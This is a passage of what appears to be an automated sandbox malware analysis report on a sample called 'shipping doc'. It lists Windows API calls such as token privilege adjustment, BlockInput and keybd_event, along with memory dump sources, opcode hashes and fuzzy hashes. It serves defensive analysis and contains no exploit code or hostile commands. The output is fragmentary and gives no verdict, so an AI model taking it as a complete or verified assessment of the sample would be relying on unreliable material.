                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 33631002-0
                                                                                              • Opcode ID: 25c150f7446d7d839f403a70a0eeea80a54b72d6a831a68336d32fa4a1126ad8
                                                                                              • Instruction ID: 8f7d819b3719cf8fbb79650dea9c8125f12cae6a164d29b0643fc8901a65d3fb
                                                                                              • Opcode Fuzzy Hash: 25c150f7446d7d839f403a70a0eeea80a54b72d6a831a68336d32fa4a1126ad8
                                                                                              • Instruction Fuzzy Hash: 59115E75E05228BFDB108F99EC45FAFBBBCEB45B50F108165F908E7290D6704A458BE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0014168C
                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001416A1
                                                                                              • FreeSid.ADVAPI32(?), ref: 001416B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 3429775523-0
                                                                                              • Opcode ID: 8c196152f28fac4fae32b8bcc47eaa944f5bc14c109c86394f76db8620225c53
                                                                                              • Instruction ID: f11d50bcc9fc8b1a8d5d9900ffecb7ccc54697e7a9d5b7501b1132e483ed8890
                                                                                              • Opcode Fuzzy Hash: 8c196152f28fac4fae32b8bcc47eaa944f5bc14c109c86394f76db8620225c53
                                                                                              • Instruction Fuzzy Hash: 5FF0F475950309FBDB00DFE49C89EAEBBBCFB08704F504565E501E2191E774AA848BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(001128E9,?,00104CBE,001128E9,001A88B8,0000000C,00104E15,001128E9,00000002,00000000,?,001128E9), ref: 00104D09
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00104CBE,001128E9,001A88B8,0000000C,00104E15,001128E9,00000002,00000000,?,001128E9), ref: 00104D10
                                                                                              • ExitProcess.KERNEL32 ref: 00104D22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 634003888e8ae48becfd7e9a6983a9ce8c7ca224b3778163ab22a5e7edce930c
                                                                                              • Instruction ID: c7804a76cfae709a96e4e2463e2d64960b57389d0f43bdb95d103e08f5e63968
                                                                                              • Opcode Fuzzy Hash: 634003888e8ae48becfd7e9a6983a9ce8c7ca224b3778163ab22a5e7edce930c
                                                                                              • Instruction Fuzzy Hash: 86E0B671000248BBCF11AF94DD49A983B79FB65785B104028FD599A572CB75DEC2CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 0013D28C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID: X64
                                                                                              • API String ID: 2645101109-893830106
                                                                                              • Opcode ID: 4f19db8af895cf3e3076420156d14e31bbcb350a009a4e8779b8ceec6d987081
                                                                                              • Instruction ID: 193bfba0bc8fc769b2496b53160ef2c2af558a4822ba4dd4e06b27faa123fd9b
                                                                                              • Opcode Fuzzy Hash: 4f19db8af895cf3e3076420156d14e31bbcb350a009a4e8779b8ceec6d987081
                                                                                              • Instruction Fuzzy Hash: DCD0C9B480111DEADF94CB90EC88DDEB37CBB04305F100156F506A2000DB3095889F50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                              • Instruction ID: 862d2e205ca86793820eb84574ca5748243602723ee4d95e44dbe7954a4b94e5
                                                                                              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                              • Instruction Fuzzy Hash: FB021C71E002199BDF14CFA9C9806ADFBF1EF58314F25826AE859E7380D771AA418FD4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00156918
                                                                                              • FindClose.KERNEL32(00000000), ref: 00156961
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: e795497110e9168a330999001037ea0d03450d807a6dd13bc195aeaeeb1b78f2
                                                                                              • Instruction ID: e60342a3056d471a440dfd9c721e8e53c8b0b026037a0563d56a8e0ac39bee26
                                                                                              • Opcode Fuzzy Hash: e795497110e9168a330999001037ea0d03450d807a6dd13bc195aeaeeb1b78f2
                                                                                              • Instruction Fuzzy Hash: 9D11BE31604600DFD710CF2AD484A16BBE1FF84329F44C6A9E8698F6A2CB30EC45CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00164891,?,?,00000035,?), ref: 001537E4
                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00164891,?,?,00000035,?), ref: 001537F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: e4c24b1a9f3602859d825b1c318a2d226303b3e4dcf6905c8be1f6b77c1026b3
                                                                                              • Instruction ID: 61574b57a8a10a86adea7bbbb03822e5db23d3f3b9d88396c96ffbfa6f0fa60a
                                                                                              • Opcode Fuzzy Hash: e4c24b1a9f3602859d825b1c318a2d226303b3e4dcf6905c8be1f6b77c1026b3
                                                                                              • Instruction Fuzzy Hash: 52F0EC706042247EE71057765C4DFDB36ADEFC4761F000165F519D3281DA605944C7F0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0014B25D
                                                                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0014B270
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: InputSendkeybd_event
                                                                                              • String ID:
                                                                                              • API String ID: 3536248340-0
                                                                                              • Opcode ID: a09e9e5733fbb8ac4809c294d8a86c727bf4010e43fba92987770b96bcaf3a13
                                                                                              • Instruction ID: 5f50a89fbcc7eb948df51ecb87f8e207538d3bd1e975a64420e5b92a14f55b1b
                                                                                              • Opcode Fuzzy Hash: a09e9e5733fbb8ac4809c294d8a86c727bf4010e43fba92987770b96bcaf3a13
                                                                                              • Instruction Fuzzy Hash: BCF01D7190428EABDB059FA0C805BAE7BB4FF04305F108009F955A51A1D779D6519F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001411FC), ref: 001410D4
                                                                                              • CloseHandle.KERNEL32(?,?,001411FC), ref: 001410E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 81990902-0
                                                                                              • Opcode ID: f901bc748ff9b39f55e2264fccc4d9489e24ebe619a676df590fb8f649798e70
                                                                                              • Instruction ID: 916f5c3706a8bc2869cee08ac7d5c80995652137441bc6f9e9ea8d083c05e4df
                                                                                              • Opcode Fuzzy Hash: f901bc748ff9b39f55e2264fccc4d9489e24ebe619a676df590fb8f649798e70
                                                                                              • Instruction Fuzzy Hash: 43E0BF72014611AEF7252B51FC05EB777A9FF04320B14882DF5A5818B1DB626CD0EB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Variable is not of type 'Object'., xrefs: 00130C40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Variable is not of type 'Object'.
                                                                                              • API String ID: 0-1840281001
                                                                                              • Opcode ID: dc134db9da653f7d6917ac97197b1e6d49dd629ce7d25bdb346e791496e6b222
                                                                                              • Instruction ID: a1ca517a35255480edca7f6621b0451dbe5574ebbd9fa06223a9fdbb3cfbdad4
                                                                                              • Opcode Fuzzy Hash: dc134db9da653f7d6917ac97197b1e6d49dd629ce7d25bdb346e791496e6b222
                                                                                              • Instruction Fuzzy Hash: B5327A709042589FEF14DF95C890EEDB7F5BF09304F244069E816BB292D776AE46CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00116766,?,?,00000008,?,?,0011FEFE,00000000), ref: 00116998
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: c714e1a3c1dbeab2e16910b6be21aaf1cb3b33949102155fb78509bf5e28e642
                                                                                              • Instruction ID: 992bc2057a89c2377180d78f56f8c6014110ebcd32b9f5760c786393769ae374
                                                                                              • Opcode Fuzzy Hash: c714e1a3c1dbeab2e16910b6be21aaf1cb3b33949102155fb78509bf5e28e642
                                                                                              • Instruction Fuzzy Hash: D0B11D71510609DFD719CF28C486BA57BE0FF45364F298668E8D9CF2A2C736D991CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 426ff38253e5f96914e607269404b2ba345336107a5dced140a4e0080b4c60dd
                                                                                              • Instruction ID: 3b6bc221b8dd8a5230c7d233c334c66d5bcde441f241a195a97a2ba611c05cd7
                                                                                              • Opcode Fuzzy Hash: 426ff38253e5f96914e607269404b2ba345336107a5dced140a4e0080b4c60dd
                                                                                              • Instruction Fuzzy Hash: C7125E719002299FDB24CF58C980AFEB7F5FF48710F14819AE949EB655EB309A81DF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • BlockInput.USER32(00000001), ref: 0015EABD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 67e7a251157142d321a7746d262cfb25d52326000f4fae6c745e64f98bcedc2b
                                                                                              • Instruction ID: ab154d418c9fc06f8c906300bb83262fd26b7cfe466554fbdcbf9a86143356c3
                                                                                              • Opcode Fuzzy Hash: 67e7a251157142d321a7746d262cfb25d52326000f4fae6c745e64f98bcedc2b
                                                                                              • Instruction Fuzzy Hash: DDE04F322002049FD714EF6AD844E9AF7EDBF98760F00842AFD5ADB351DB70E9858B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001003EE), ref: 001009DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 3702a5fa0ecfa9e7f477c00993bec5a869812eac80472b66e62902dc1237fcac
                                                                                              • Instruction ID: bbe78771b218d447ec4c236ddf3c8b305a58cdeaba5475c2726f498c837b12d0
                                                                                              • Opcode Fuzzy Hash: 3702a5fa0ecfa9e7f477c00993bec5a869812eac80472b66e62902dc1237fcac
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                              • Instruction ID: 006b51a0a02365549193f238c125432dbc2ec4419a8c40827718ef6c286a9ddf
                                                                                              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                              • Instruction Fuzzy Hash: 25518A71E0C7099BDF389528885DBBE6385AB52354F18850BD8C2C72C2CBD1FE41D362
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfe8232c4f16e7ccf39ac12726aada5b342568aa49914961039a786fb7c48b88
                                                                                              • Instruction ID: b8f9c82d3267207cf429a1c6000e7ddad57f7ecd59e4cd4a59d9c901ddb86fd4
                                                                                              • Opcode Fuzzy Hash: dfe8232c4f16e7ccf39ac12726aada5b342568aa49914961039a786fb7c48b88
                                                                                              • Instruction Fuzzy Hash: 8A32FF32D29F014DD7279634C822336A699AFB73C5F15D737E81AB5EA9EB3985C34200
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 369a511c3155235023d1bcb9396b8dac8dcb58ea4fcd46f62971141fa7a4911a
                                                                                              • Instruction ID: 5499b5bac353db586a39cae3b4088df13ee65cdf008e7061b83d95e50b4f4959
                                                                                              • Opcode Fuzzy Hash: 369a511c3155235023d1bcb9396b8dac8dcb58ea4fcd46f62971141fa7a4911a
                                                                                              • Instruction Fuzzy Hash: E9322932A0015D8BDF28CF29C595A7DBBE1EF45310F29816AD959EB691E330DD81EBC0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a861d772ec3d72ea5589027663c05861389ead7a4b34b3ff0fa7753f21b2d73
                                                                                              • Instruction ID: 10c47fd5b8095ed13708ec092b772595e603d7dbe20c0324256f43327e53bbbb
                                                                                              • Opcode Fuzzy Hash: 9a861d772ec3d72ea5589027663c05861389ead7a4b34b3ff0fa7753f21b2d73
                                                                                              • Instruction Fuzzy Hash: 6822C170A0465ADFDF14CF65D881AEEB7F6FF48300F244629E816A7291EB35AD50CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
